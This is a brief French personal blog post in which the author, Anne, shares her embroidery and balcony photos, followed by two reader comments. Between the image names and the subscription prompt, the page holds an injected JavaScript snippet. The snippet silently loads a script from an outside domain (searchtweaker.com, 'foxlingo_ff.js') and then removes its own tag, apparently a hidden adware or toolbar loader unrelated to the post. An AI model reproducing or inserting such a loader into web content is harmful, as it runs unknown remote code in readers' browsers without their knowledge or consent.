encore moi

Publié le

est je suis encore présente sur mon blog .Je prend un peu de temps pour vous montrez mes ouvrages et aussi la vue de ma chambre

voilà pour aujourd'hui

comme vous le voyiez sue la photo un peu de nuages mais pas de pluie un rayon de soleil

je vous dit @plus ANNE

sal-bleu.jpg

mon-balcon-1-le-13-3-13.JPG

mon-balcon-2-le-13-03-13.JPG

mon-balcon-3-le-13-03-13.JPG

 

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Pour être informé des derniers articles, inscrivez vous :
Commenter cet article
M
je dois aller à Nice en septembre prochain pour le boulot !!!!!!!!!
Répondre
O
Ta broderie est superbe, de qui est ce modèle ?
Répondre